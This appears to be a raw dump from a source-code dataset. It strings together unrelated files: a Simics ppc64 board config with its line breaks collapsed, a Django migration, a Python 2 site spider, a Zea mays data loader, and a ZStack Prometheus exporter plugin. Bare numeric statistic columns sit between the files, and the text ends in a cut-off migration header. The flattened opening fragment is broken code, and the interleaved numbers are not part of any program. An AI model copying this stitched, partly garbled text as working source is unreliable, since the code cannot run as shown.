pre_obj('pci_io', 'memory-space') self.o.hfs = pre_obj('hfs$', 'hostfs') self.o.phys_mem.map = [ [0x00000000, self.o.ram, 0, 0x0, self.memory_megs * 0x100000], [self.map_offset + 0x08000000, self.o.pci_io, 0, 0x0, 0x100000], [self.map_offset + 0x0f660000, self.o.hfs, 0, 0, 0x10], [self.map_offset + 0x0fc00000, self.o.pic, 0, 0x0, 0x100000]] self.o.pci_io.map = [ [0x020, self.o.irq, 0, 0x20, 0x1], [0x021, self.o.irq, 0, 0x21, 0x1], [0x0a0, self.o.irq, 0, 0xa0, 0x1], [0x0a1, self.o.irq, 0, 0xa1, 0x1], # Linux probes for UARTs at 0x2e8 and 0x3e8 too, so provide # 
empty mappings there [0x2e8, self.o.empty, 0, 0x0, 0x8], # two NS16550, at the traditional addresses [0x2f8, self.o.uart1, 0, 0x0, 0x8, None, 0, 1], [0x3e8, self.o.empty, 0, 0x0, 0x8], [0x3f8, self.o.uart0, 0, 0x0, 0x8, None, 0, 1], # no UARTs here either [0x890, self.o.empty, 0, 0x0, 0x8], [0x898, self.o.empty, 0, 0x0, 0x8]] def add_connector_info(self): self.connector_info['uart0'] = [None, self.o.uart0, self.o.uart0.name] self.connector_info['uart1'] = [None, self.o.uart1, self.o.uart1.name] def connect_serial(self, connector, link, console): if connector == 'uart0': if link: self.o.uart0.link = link else: self.o.uart0.console = console elif connector == 'uart1': if link: self.o.uart1.link = link else: self.o.uart1.console = console def disconnect_serial(self, connector): if connector == 'uart0': self.o.uart0.link = None self.o.uart0.console = None elif connector == 'uart1': self.o.uart1.link = None self.o.uart1.console = None def get_clock(self): return self.o.cpu[0] def get_processors(self): return self.o.cpu ppc64_simple_attributes = [ ['cpu_frequency', Sim_Attr_Required, 'f', 'Processor frequency in MHz.'], ['memory_megs', Sim_Attr_Required, 'i', 'The amount of RAM in megabytes.'], ['map_offset', Sim_Attr_Optional, 'i', 'Base address for device mappings. ' \ 'Offsets at 4 GB and above will not work'], ['time_of_day', Sim_Attr_Optional, 's', 'Date and time to initialize the OpenFirmware RTC to']]
37.587571
78
0.599579
932
6,653
4.124464
0.262876
0.081946
0.028616
0.024714
0.21488
0.159729
0.114724
0.086889
0.086889
0.086889
0
0.058848
0.284834
6,653
176
79
37.801136
0.749054
0.167143
0
0.165354
0
0
0.105857
0
0
0
0.039651
0
0
0
null
null
0
0.023622
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5da9e73a716a3d83801c56b0312fd8f4d87f351c
385
py
Python
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
Front-end (Django)/course/migrations/0002_subject_number_of_questions.py
shadow0403bsr/AutomatedGradingSoftware
5031d22683a05f937615b3b8997152c285a2f930
[ "MIT" ]
null
null
null
# Generated by Django 3.0.1 on 2020-02-15 06:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('course', '0001_initial'), ] operations = [ migrations.AddField( model_name='subject', name='Number_Of_Questions', field=models.IntegerField(default=0), ), ]
20.263158
49
0.597403
41
385
5.512195
0.804878
0
0
0
0
0
0
0
0
0
0
0.072993
0.288312
385
18
50
21.388889
0.751825
0.116883
0
0
1
0
0.130178
0
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5db0d4e1070be8121a1c33bca072f550967ebe82
6,969
py
Python
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
5
2015-05-11T18:13:51.000Z
2021-07-17T04:53:27.000Z
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
1
2015-03-06T20:32:14.000Z
2015-03-06T20:32:14.000Z
eek/spider.py
fusionbox/eek
8e962b7ad80c594a3498190fead016db826771e0
[ "BSD-2-Clause-FreeBSD" ]
2
2015-07-15T12:41:32.000Z
2015-10-12T21:40:14.000Z
import urlparse import csv import sys import re import collections import time import requests from eek import robotparser # this project's version from bs4 import BeautifulSoup try: import lxml except ImportError: HTML_PARSER = None else: HTML_PARSER = 'lxml' encoding_re = re.compile("charset\s*=\s*(\S+?)(;|$)") html_re = re.compile("text/html") headers = ['url', 'title', 'description', 'keywords', 'allow', 'disallow', 'noindex', 'meta robots', 'canonical', 'referer', 'status'] def encoding_from_content_type(content_type): """ Extracts the charset from a Content-Type header. >>> encoding_from_content_type('text/html; charset=utf-8') 'utf-8' >>> encoding_from_content_type('text/html') >>> """ if not content_type: return None match = encoding_re.search(content_type) return match and match.group(1) or None class NotHtmlException(Exception): pass class UrlTask(tuple): """ We need to keep track of referers, but we don't want to add a url multiple times just because it was referenced on multiple pages """ def __hash__(self): return hash(self[0]) def __eq__(self, other): return self[0] == other[0] class VisitOnlyOnceClerk(object): def __init__(self): self.visited = set() self.to_visit = set() def enqueue(self, url, referer): if not url in self.visited: self.to_visit.add(UrlTask((url, referer))) def __bool__(self): return bool(self.to_visit) def __iter__(self): while self.to_visit: (url, referer) = self.to_visit.pop() self.visited.add(url) yield (url, referer) def lremove(string, prefix): """ Remove a prefix from a string, if it exists. 
>>> lremove('www.foo.com', 'www.') 'foo.com' >>> lremove('foo.com', 'www.') 'foo.com' """ if string.startswith(prefix): return string[len(prefix):] else: return string def beautify(response): content_type = response.headers.get('content-type') if content_type: if not html_re.search(content_type): raise NotHtmlException encoding = encoding_from_content_type(content_type) else: encoding = None try: return BeautifulSoup( response.content, features=HTML_PARSER, from_encoding=encoding, ) except UnicodeEncodeError: raise NotHtmlException def get_links(response): if 300 <= response.status_code < 400 and response.headers['location']: # redirect yield urlparse.urldefrag( urlparse.urljoin(response.url, response.headers['location'], False) )[0] try: html = beautify(response) for i in html.find_all('a', href=True): yield urlparse.urldefrag(urlparse.urljoin(response.url, i['href'], False))[0] except NotHtmlException: pass def force_unicode(s): if isinstance(s, str): return unicode(s, encoding='utf-8') else: return s def force_bytes(str_or_unicode): if isinstance(str_or_unicode, unicode): return str_or_unicode.encode('utf-8') else: return str_or_unicode def get_pages(base, clerk, session=requests.session()): clerk.enqueue(base, base) base_domain = lremove(urlparse.urlparse(base).netloc, 'www.') for (url, referer) in clerk: url = force_bytes(url) referer = force_bytes(referer) response = session.get( url, headers={'Referer': referer, 'User-Agent': 'Fusionbox spider'}, allow_redirects=False, ) for link in get_links(response): parsed = urlparse.urlparse(link) if lremove(parsed.netloc, 'www.') == base_domain: clerk.enqueue(link, url) yield referer, response def metadata_spider(base, output=sys.stdout, delay=0, insecure=False): writer = csv.writer(output) robots = robotparser.RobotFileParser(base + '/robots.txt') robots.read() writer.writerow(headers) session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), 
session=session): rules = applicable_robot_rules(robots, response.url) robots_meta = canonical = title = description = keywords = '' try: html = beautify(response) robots_meta = ','.join(i['content'] for i in html.find_all('meta', {"name": "robots"})) try: canonical = html.find_all('link', {"rel": "canonical"})[0]['href'] except IndexError: pass try: title = html.head.title.contents[0] except (AttributeError, IndexError): pass try: description = html.head.find_all('meta', {"name": "description"})[0]['content'] except (AttributeError, IndexError, KeyError): pass try: keywords = html.head.find_all('meta', {"name": "keywords"})[0]['content'] except (AttributeError, IndexError, KeyError): pass except NotHtmlException: pass writer.writerow(map(force_bytes, [ response.url, title, description, keywords, ','.join(rules['allow']), ','.join(rules['disallow']), ','.join(rules['noindex']), robots_meta, canonical, referer, response.status_code, ])) if delay: time.sleep(delay) def grep_spider(base, pattern, delay=0, insensitive=False, insecure=False): flags = 0 if insensitive: flags |= re.IGNORECASE pattern = re.compile(pattern, flags) session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), session=session): for line in response.content.split('\n'): if pattern.search(line): print u'%s:%s' % (force_unicode(response.url), force_unicode(line)) if delay: time.sleep(delay) def graphviz_spider(base, delay=0, insecure=False): print "digraph links {" session = requests.session() session.verify = not insecure for referer, response in get_pages(base, VisitOnlyOnceClerk(), session=session): for link in get_links(response): print ' "%s" -> "%s";' % (force_bytes(response.url), force_bytes(link)) if delay: time.sleep(delay) print "}" def applicable_robot_rules(robots, url): rules = collections.defaultdict(list) if robots.default_entry: rules[robots.default_entry.allowance(url)].append('*') for entry in robots.entries: 
rules[entry.allowance(url)].extend(entry.useragents) return rules
29.529661
99
0.605252
791
6,969
5.208597
0.25158
0.034709
0.01335
0.02233
0.215534
0.203155
0.129126
0.081553
0.081553
0.081553
0
0.004951
0.275506
6,969
235
100
29.655319
0.811052
0.004448
0
0.251397
0
0
0.056938
0.003889
0
0
0
0
0
0
null
null
0.039106
0.061453
null
null
0.022346
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5db204f5af9206eceaf400a510a5e3d05316e861
2,647
py
Python
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
199
2017-07-24T01:34:27.000Z
2022-01-29T00:50:55.000Z
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
46
2017-09-05T19:27:20.000Z
2019-01-07T09:47:26.000Z
observations/r/zea_mays.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
45
2017-07-26T00:10:44.000Z
2022-03-16T20:44:59.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def zea_mays(path): """Darwin's Heights of Cross- and Self-fertilized Zea May Pairs Darwin (1876) studied the growth of pairs of zea may (aka corn) seedlings, one produced by cross-fertilization and the other produced by self-fertilization, but otherwise grown under identical conditions. His goal was to demonstrate the greater vigour of the cross-fertilized plants. The data recorded are the final height (inches, to the nearest 1/8th) of the plants in each pair. In the *Design of Experiments*, Fisher (1935) used these data to illustrate a paired t-test (well, a one-sample test on the mean difference, `cross - self`). Later in the book (section 21), he used this data to illustrate an early example of a non-parametric permutation test, treating each paired difference as having (randomly) either a positive or negative sign. A data frame with 15 observations on the following 4 variables. `pair` pair number, a numeric vector `pot` pot, a factor with levels `1` `2` `3` `4` `cross` height of cross fertilized plant, a numeric vector `self` height of self fertilized plant, a numeric vector `diff` `cross - self` for each pair Darwin, C. (1876). *The Effect of Cross- and Self-fertilization in the Vegetable Kingdom*, 2nd Ed. London: John Murray. Andrews, D. and Herzberg, A. (1985) *Data: a collection of problems from many fields for the student and research worker*. New York: Springer. Data retrieved from: `https://www.stat.cmu.edu/StatDat/` Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `zea_mays.csv`. Returns: Tuple of np.ndarray `x_train` with 15 rows and 5 columns and dictionary `metadata` of column headers (feature names). 
""" import pandas as pd path = os.path.expanduser(path) filename = 'zea_mays.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/HistData/ZeaMays.csv' maybe_download_and_extract(path, url, save_file_name='zea_mays.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
32.679012
74
0.705327
394
2,647
4.65736
0.532995
0.015259
0.026158
0.025068
0.055586
0
0
0
0
0
0
0.015934
0.217605
2,647
80
75
33.0875
0.870111
0.671326
0
0
0
0
0.101394
0
0
0
0
0
0
1
0.045455
false
0
0.409091
0
0.5
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5db6309005811059a99432092acd5ed62236c399
23,282
py
Python
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
kvmagent/kvmagent/plugins/prometheus.py
qianfei11/zstack-utility
e791bc6b6ae3a74e202f6fce84bde498c715aee8
[ "Apache-2.0" ]
null
null
null
import os.path import threading import typing from prometheus_client import start_http_server from prometheus_client.core import GaugeMetricFamily, REGISTRY from kvmagent import kvmagent from zstacklib.utils import http from zstacklib.utils import jsonobject from zstacklib.utils import lock from zstacklib.utils import lvm from zstacklib.utils import misc from zstacklib.utils import thread from zstacklib.utils.bash import * from zstacklib.utils.ip import get_nic_supported_max_speed logger = log.get_logger(__name__) collector_dict = {} # type: Dict[str, threading.Thread] latest_collect_result = {} collectResultLock = threading.RLock() QEMU_CMD = kvmagent.get_qemu_path().split("/")[-1] def read_number(fname): res = linux.read_file(fname) return 0 if not res else int(res) def collect_host_network_statistics(): all_eths = os.listdir("/sys/class/net/") virtual_eths = os.listdir("/sys/devices/virtual/net/") interfaces = [] for eth in all_eths: eth = eth.strip(' \t\n\r') if eth in virtual_eths: continue if eth == 'bonding_masters': continue elif not eth: continue else: interfaces.append(eth) all_in_bytes = 0 all_in_packets = 0 all_in_errors = 0 all_out_bytes = 0 all_out_packets = 0 all_out_errors = 0 for intf in interfaces: all_in_bytes += read_number("/sys/class/net/{}/statistics/rx_bytes".format(intf)) all_in_packets += read_number("/sys/class/net/{}/statistics/rx_packets".format(intf)) all_in_errors += read_number("/sys/class/net/{}/statistics/rx_errors".format(intf)) all_out_bytes += read_number("/sys/class/net/{}/statistics/tx_bytes".format(intf)) all_out_packets += read_number("/sys/class/net/{}/statistics/tx_packets".format(intf)) all_out_errors += read_number("/sys/class/net/{}/statistics/tx_errors".format(intf)) metrics = { 'host_network_all_in_bytes': GaugeMetricFamily('host_network_all_in_bytes', 'Host all inbound traffic in bytes'), 'host_network_all_in_packages': GaugeMetricFamily('host_network_all_in_packages', 'Host all inbound traffic in packages'), 
'host_network_all_in_errors': GaugeMetricFamily('host_network_all_in_errors', 'Host all inbound traffic errors'), 'host_network_all_out_bytes': GaugeMetricFamily('host_network_all_out_bytes', 'Host all outbound traffic in bytes'), 'host_network_all_out_packages': GaugeMetricFamily('host_network_all_out_packages', 'Host all outbound traffic in packages'), 'host_network_all_out_errors': GaugeMetricFamily('host_network_all_out_errors', 'Host all outbound traffic errors'), } metrics['host_network_all_in_bytes'].add_metric([], float(all_in_bytes)) metrics['host_network_all_in_packages'].add_metric([], float(all_in_packets)) metrics['host_network_all_in_errors'].add_metric([], float(all_in_errors)) metrics['host_network_all_out_bytes'].add_metric([], float(all_out_bytes)) metrics['host_network_all_out_packages'].add_metric([], float(all_out_packets)) metrics['host_network_all_out_errors'].add_metric([], float(all_out_errors)) return metrics.values() def collect_host_capacity_statistics(): default_zstack_path = '/usr/local/zstack/apache-tomcat/webapps/zstack' zstack_env_path = os.environ.get('ZSTACK_HOME', None) if zstack_env_path and zstack_env_path != default_zstack_path: default_zstack_path = zstack_env_path zstack_dir = ['/var/lib/zstack', '%s/../../../' % default_zstack_path, '/opt/zstack-dvd/', '/var/log/zstack', '/var/lib/mysql', '/var/lib/libvirt', '/tmp/zstack'] metrics = { 'zstack_used_capacity_in_bytes': GaugeMetricFamily('zstack_used_capacity_in_bytes', 'ZStack used capacity in bytes') } zstack_used_capacity = 0 for dir in zstack_dir: if not os.path.exists(dir): continue cmd = "du -bs %s | awk {\'print $1\'}" % dir res = bash_o(cmd) zstack_used_capacity += int(res) metrics['zstack_used_capacity_in_bytes'].add_metric([], float(zstack_used_capacity)) return metrics.values() def collect_lvm_capacity_statistics(): metrics = { 'vg_size': GaugeMetricFamily('vg_size', 'volume group size', None, ['vg_name']), 'vg_avail': GaugeMetricFamily('vg_avail', 'volume group and 
thin pool free size', None, ['vg_name']), } r = bash_r("grep -Ev '^[[:space:]]*#|^[[:space:]]*$' /etc/multipath/wwids") if r == 0: linux.set_fail_if_no_path() r, o, e = bash_roe("vgs --nolocking --noheading -oname") if r != 0 or len(o.splitlines()) == 0: return metrics.values() vg_names = o.splitlines() for name in vg_names: name = name.strip() size, avail = lvm.get_vg_size(name, False) metrics['vg_size'].add_metric([name], float(size)) metrics['vg_avail'].add_metric([name], float(avail)) return metrics.values() def convert_raid_state_to_int(state): """ :type state: str """ state = state.lower() if state == "optimal": return 0 elif state == "degraded": return 5 else: return 100 def convert_disk_state_to_int(state): """ :type state: str """ state = state.lower() if "online" in state or "jobd" in state: return 0 elif "rebuild" in state: return 5 elif "failed" in state: return 10 elif "unconfigured" in state: return 15 else: return 100 def collect_raid_state(): metrics = { 'raid_state': GaugeMetricFamily('raid_state', 'raid state', None, ['target_id']), 'physical_disk_state': GaugeMetricFamily('physical_disk_state', 'physical disk state', None, ['slot_number', 'disk_group']), 'physical_disk_temperature': GaugeMetricFamily('physical_disk_temperature', 'physical disk temperature', None, ['slot_number', 'disk_group']), } if bash_r("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll") != 0: return metrics.values() raid_info = bash_o("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll | grep -E 'Target Id|State'").strip().splitlines() target_id = state = "unknown" for info in raid_info: if "Target Id" in info: target_id = info.strip().strip(")").split(" ")[-1] else: state = info.strip().split(" ")[-1] metrics['raid_state'].add_metric([target_id], convert_raid_state_to_int(state)) disk_info = bash_o( "/opt/MegaRAID/MegaCli/MegaCli64 -PDList -aAll | grep -E 'Slot Number|DiskGroup|Firmware state|Drive Temperature'").strip().splitlines() slot_number = state = disk_group = 
"unknown" for info in disk_info: if "Slot Number" in info: slot_number = info.strip().split(" ")[-1] elif "DiskGroup" in info: kvs = info.replace("Drive's position: ", "").split(",") disk_group = filter(lambda x: "DiskGroup" in x, kvs)[0] disk_group = disk_group.split(" ")[-1] elif "Drive Temperature" in info: temp = info.split(":")[1].split("C")[0] metrics['physical_disk_temperature'].add_metric([slot_number, disk_group], int(temp)) else: disk_group = "JBOD" if disk_group == "unknown" and info.count("JBOD") > 0 else disk_group disk_group = "unknown" if disk_group is None else disk_group state = info.strip().split(":")[-1] metrics['physical_disk_state'].add_metric([slot_number, disk_group], convert_disk_state_to_int(state)) return metrics.values() def collect_equipment_state(): metrics = { 'power_supply': GaugeMetricFamily('power_supply', 'power supply', None, ['ps_id']), 'ipmi_status': GaugeMetricFamily('ipmi_status', 'ipmi status', None, []), 'physical_network_interface': GaugeMetricFamily('physical_network_interface', 'physical network interface', None, ['interface_name', 'speed']), } r, ps_info = bash_ro("ipmitool sdr type 'power supply'") # type: (int, str) if r == 0: for info in ps_info.splitlines(): info = info.strip() ps_id = info.split("|")[0].strip().split(" ")[0] health = 10 if "fail" in info.lower() or "lost" in info.lower() else 0 metrics['power_supply'].add_metric([ps_id], health) metrics['ipmi_status'].add_metric([], bash_r("ipmitool mc info")) nics = bash_o("find /sys/class/net -type l -not -lname '*virtual*' -printf '%f\\n'").splitlines() if len(nics) != 0: for nic in nics: nic = nic.strip() try: # NOTE(weiw): sriov nic contains carrier file but can not read status = linux.read_file("/sys/class/net/%s/carrier" % nic) == 1 except Exception as e: status = True speed = str(get_nic_supported_max_speed(nic)) metrics['physical_network_interface'].add_metric([nic, speed], status) return metrics.values() def collect_vm_statistics(): metrics = { 
'cpu_occupied_by_vm': GaugeMetricFamily('cpu_occupied_by_vm', 'Percentage of CPU used by vm', None, ['vmUuid']) } r, pid_vm_map_str = bash_ro("ps --no-headers u -C \"%s -name\" | awk '{print $2,$13}'" % QEMU_CMD) if r != 0 or len(pid_vm_map_str.splitlines()) == 0: return metrics.values() pid_vm_map_str = pid_vm_map_str.replace(",debug-threads=on", "").replace("guest=", "") '''pid_vm_map_str samples: 38149 e8e6f27bfb2d47e08c59cbea1d0488c3 38232 afa02edca7eb4afcb5d2904ac1216eb1 ''' pid_vm_map = {} for pid_vm in pid_vm_map_str.splitlines(): arr = pid_vm.split() if len(arr) == 2: pid_vm_map[arr[0]] = arr[1] def collect(vm_pid_arr): vm_pid_arr_str = ','.join(vm_pid_arr) r, pid_cpu_usages_str = bash_ro("top -b -n 1 -p %s | grep qemu | awk '{print $1,$9}'" % vm_pid_arr_str) if r != 0 or len(pid_cpu_usages_str.splitlines()) == 0: return for pid_cpu_usage in pid_cpu_usages_str.splitlines(): arr = pid_cpu_usage.split() pid = arr[0] vm_uuid = pid_vm_map[pid] cpu_usage = arr[1] metrics['cpu_occupied_by_vm'].add_metric([vm_uuid], float(cpu_usage)) n = 10 for i in range(0, len(pid_vm_map.keys()), n): collect(pid_vm_map.keys()[i:i + n]) return metrics.values() collect_node_disk_wwid_last_time = None collect_node_disk_wwid_last_result = None def collect_node_disk_wwid(): global collect_node_disk_wwid_last_time global collect_node_disk_wwid_last_result # NOTE(weiw): some storage can not afford frequent TUR. 
ref: ZSTAC-23416 if collect_node_disk_wwid_last_time is None: collect_node_disk_wwid_last_time = time.time() elif time.time() - collect_node_disk_wwid_last_time < 60 and collect_node_disk_wwid_last_result is not None: return collect_node_disk_wwid_last_result metrics = { 'node_disk_wwid': GaugeMetricFamily('node_disk_wwid', 'node disk wwid', None, ["disk", "wwid"]) } pvs = bash_o("pvs --nolocking --noheading -o pv_name").strip().splitlines() for pv in pvs: multipath_wwid = None if bash_r("dmsetup table %s | grep multipath" % pv) == 0: multipath_wwid = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id/dm-uuid' | awk -F '-' '{print $NF}'" % pv).strip() disks = linux.get_physical_disk(pv, False) for disk in disks: disk_name = disk.split("/")[-1].strip() wwids = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id' | awk -F '/' '{print $NF}' | grep -v '^lvm-pv' | sort" % disk).strip().splitlines() if multipath_wwid is not None: wwids.append(multipath_wwid) if len(wwids) > 0: metrics['node_disk_wwid'].add_metric([disk_name, ";".join([w.strip() for w in wwids])], 1) collect_node_disk_wwid_last_result = metrics.values() return metrics.values() kvmagent.register_prometheus_collector(collect_host_network_statistics) kvmagent.register_prometheus_collector(collect_host_capacity_statistics) kvmagent.register_prometheus_collector(collect_vm_statistics) kvmagent.register_prometheus_collector(collect_node_disk_wwid) if misc.isMiniHost(): kvmagent.register_prometheus_collector(collect_lvm_capacity_statistics) kvmagent.register_prometheus_collector(collect_raid_state) kvmagent.register_prometheus_collector(collect_equipment_state) class PrometheusPlugin(kvmagent.KvmAgent): COLLECTD_PATH = "/prometheus/collectdexporter/start" @kvmagent.replyerror @in_bash def start_prometheus_exporter(self, req): @in_bash def start_collectd(cmd): conf_path = os.path.join(os.path.dirname(cmd.binaryPath), 'collectd.conf') conf = '''Interval {{INTERVAL}} # version {{VERSION}} FQDNLookup false 
LoadPlugin syslog LoadPlugin aggregation LoadPlugin cpu LoadPlugin disk LoadPlugin interface LoadPlugin memory LoadPlugin network LoadPlugin virt <Plugin aggregation> <Aggregation> #Host "unspecified" Plugin "cpu" #PluginInstance "unspecified" Type "cpu" #TypeInstance "unspecified" GroupBy "Host" GroupBy "TypeInstance" CalculateNum false CalculateSum false CalculateAverage true CalculateMinimum false CalculateMaximum false CalculateStddev false </Aggregation> </Plugin> <Plugin cpu> ReportByCpu true ReportByState true ValuesPercentage true </Plugin> <Plugin disk> Disk "/^sd[a-z]$/" Disk "/^hd[a-z]$/" Disk "/^vd[a-z]$/" IgnoreSelected false </Plugin> <Plugin "interface"> {% for i in INTERFACES -%} Interface "{{i}}" {% endfor -%} IgnoreSelected false </Plugin> <Plugin memory> ValuesAbsolute true ValuesPercentage false </Plugin> <Plugin virt> Connection "qemu:///system" RefreshInterval {{INTERVAL}} HostnameFormat name PluginInstanceFormat name BlockDevice "/:hd[a-z]/" IgnoreSelected true ExtraStats "vcpu memory" </Plugin> <Plugin network> Server "localhost" "25826" </Plugin> ''' tmpt = Template(conf) conf = tmpt.render({ 'INTERVAL': cmd.interval, 'INTERFACES': interfaces, 'VERSION': cmd.version, }) need_restart_collectd = False if os.path.exists(conf_path): with open(conf_path, 'r') as fd: old_conf = fd.read() if old_conf != conf: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True else: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True cpid = linux.find_process_by_command('collectd', [conf_path]) mpid = linux.find_process_by_command('collectdmon', [conf_path]) if not cpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -TERM %s' % cpid) if need_restart_collectd: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -HUP %s' % mpid) else: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) def run_in_systemd(binPath, args, log): def 
get_systemd_name(path): if "collectd_exporter" in path: return "collectd_exporter" elif "node_exporter" in path: return "node_exporter" elif "pushgateway" in path: return "pushgateway" def reload_and_restart_service(service_name): bash_errorout("systemctl daemon-reload && systemctl restart %s.service" % service_name) service_name = get_systemd_name(binPath) service_path = '/etc/systemd/system/%s.service' % service_name service_conf = ''' [Unit] Description=prometheus %s After=network.target [Service] ExecStart=/bin/sh -c '%s %s > %s 2>&1' ExecStop=/bin/sh -c 'pkill -TERM -f %s' Restart=always RestartSec=30s [Install] WantedBy=multi-user.target ''' % (service_name, binPath, args, '/dev/null' if log.endswith('/pushgateway.log') else log, binPath) if not os.path.exists(service_path): linux.write_file(service_path, service_conf, True) os.chmod(service_path, 0644) reload_and_restart_service(service_name) return if linux.read_file(service_path) != service_conf: linux.write_file(service_path, service_conf, True) logger.info("%s.service conf changed" % service_name) os.chmod(service_path, 0644) # restart service regardless of conf changes, for ZSTAC-23539 reload_and_restart_service(service_name) @lock.file_lock("/run/collectd-conf.lock", locker=lock.Flock()) def start_collectd_exporter(cmd): start_collectd(cmd) start_exporter(cmd) @in_bash def start_exporter(cmd): EXPORTER_PATH = cmd.binaryPath LOG_FILE = os.path.join(os.path.dirname(EXPORTER_PATH), cmd.binaryPath + '.log') ARGUMENTS = cmd.startupArguments if not ARGUMENTS: ARGUMENTS = "" os.chmod(EXPORTER_PATH, 0o755) run_in_systemd(EXPORTER_PATH, ARGUMENTS, LOG_FILE) para = jsonobject.loads(req[http.REQUEST_BODY]) rsp = kvmagent.AgentResponse() eths = bash_o("ls /sys/class/net").split() interfaces = [] for eth in eths: eth = eth.strip(' \t\n\r') if eth == 'lo': continue if eth == 'bonding_masters': continue elif eth.startswith('vnic'): continue elif eth.startswith('outer'): continue elif eth.startswith('br_'): continue 
elif not eth: continue else: interfaces.append(eth) for cmd in para.cmds: if "collectd_exporter" in cmd.binaryPath: start_collectd_exporter(cmd) else: start_exporter(cmd) return jsonobject.dumps(rsp) def install_colletor(self): class Collector(object): __collector_cache = {} @classmethod def __get_cache__(cls): # type: () -> list keys = cls.__collector_cache.keys() if keys is None or len(keys) == 0: return None if (time.time() - keys[0]) < 9: return cls.__collector_cache.get(keys[0]) return None @classmethod def __store_cache__(cls, ret): # type: (list) -> None cls.__collector_cache.clear() cls.__collector_cache.update({time.time(): ret}) @classmethod def check(cls, v): try: if v is None: return False if isinstance(v, GaugeMetricFamily): return Collector.check(v.samples) if isinstance(v, list) or isinstance(v, tuple): for vl in v: if Collector.check(vl) is False: return False if isinstance(v, dict): for vk in v.iterkeys(): if vk == "timestamp" or vk == "exemplar": continue if Collector.check(v[vk]) is False: return False except Exception as e: logger.warn("got exception in check value %s: %s" % (v, e)) return True return True def collect(self): global latest_collect_result ret = [] def get_result_run(f, fname): # type: (typing.Callable, str) -> None global collectResultLock global latest_collect_result r = f() if not Collector.check(r): logger.warn("result from collector %s contains illegal character None, details: \n%s" % (fname, r)) return with collectResultLock: latest_collect_result[fname] = r cache = Collector.__get_cache__() if cache is not None: return cache for c in kvmagent.metric_collectors: name = "%s.%s" % (c.__module__, c.__name__) if collector_dict.get(name) is not None and collector_dict.get(name).is_alive(): continue collector_dict[name] = thread.ThreadFacade.run_in_thread(get_result_run, (c, name,)) for i in range(7): for t in collector_dict.values(): if t.is_alive(): time.sleep(0.5) continue for k in collector_dict.iterkeys(): if 
collector_dict[k].is_alive(): logger.warn("It seems that the collector [%s] has not been completed yet," " temporarily use the last calculation result." % k) for v in latest_collect_result.itervalues(): ret.extend(v) Collector.__store_cache__(ret) return ret REGISTRY.register(Collector()) def start(self): http_server = kvmagent.get_http_server() http_server.register_async_uri(self.COLLECTD_PATH, self.start_prometheus_exporter) self.install_colletor() start_http_server(7069) def stop(self): pass
36.492163
157
0.583541
2,701
23,282
4.779341
0.171788
0.017042
0.019521
0.017662
0.296692
0.17972
0.103029
0.055078
0.043613
0.032458
0
0.009802
0.307663
23,282
637
158
36.549451
0.791054
0.013616
0
0.200787
0
0.011811
0.229337
0.058454
0
0
0
0
0
0
null
null
0.001969
0.027559
null
null
0.011811
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5dba0da51e77fecfd4eb4bbfdb42e2e652206d09
1,322
py
Python
core/migrations/0011_itemvariation_variation.py
manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
1
2020-02-08T16:29:41.000Z
2020-02-08T16:29:41.000Z
core/migrations/0011_itemvariation_variation.py
